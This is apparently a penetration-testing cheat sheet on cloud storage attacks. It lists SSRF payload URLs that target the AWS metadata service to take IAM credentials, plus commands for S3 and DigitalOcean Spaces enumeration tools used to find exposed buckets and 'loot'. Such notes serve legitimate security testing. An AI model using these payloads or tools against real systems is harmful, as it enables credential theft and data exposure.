Look for static content in HTML, you can find content hosted on s3 bucket for example and then exploit it
AWS Bucket access (SSRF for example)
# You can get informations and secret about an S3 bucket# Credentials, main goal
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2toS3/
# You might need the zone
http://169.254.169.254/latest/dynamic/instance-identity/document
# Then set # AWS_ACCESS_KEY_ID# AWS_SECRET_ACCESS_KEY# AWS_DEFAULT_REGION# AWS_SESSION_TOKEN
Amazon S3 (AWS) Buckets
# Tools like AWSBucketDump can enumerate AWS S3 buckets
https://github.com/jordanpotti/AWSBucketDump
Teh S3 Bucketeers
https://github.com/tomdev/teh_s3_bucketeers/
# You need an AWS account and set your API key in ~/.aws/credentials[default]aws_access_key_id= <key>
aws_secret_access_key= <secret>
# Then just run it
./bucketeer.sh <target> <target>
# Find interesting Amazon S3 Buckets by watching certificate transparency logs.# This tool simply listens to various certificate transparency logs (via certstream) # and attempts to find public S3 buckets from permutations of the certificates domain name# Basic
python3 bucket-stream.py
# You can put credentials / API key in confi.yml file and the tool will try to authenticate and identify bucket owners
# Spaces finder is a tool to quickly enumerate DigitalOcean Spaces to look for loot. # It's similar to a subdomain bruteforcer but is made specifically for DigitalOcean Spaces# Use SecLists as wordlists# If targetting specific company, uses enumall tool to get wordlist
python3 spaces_finder.py -l SpacesNames.txt -g interesting_keywords.txt -D -m 500000 -d 1 -t 5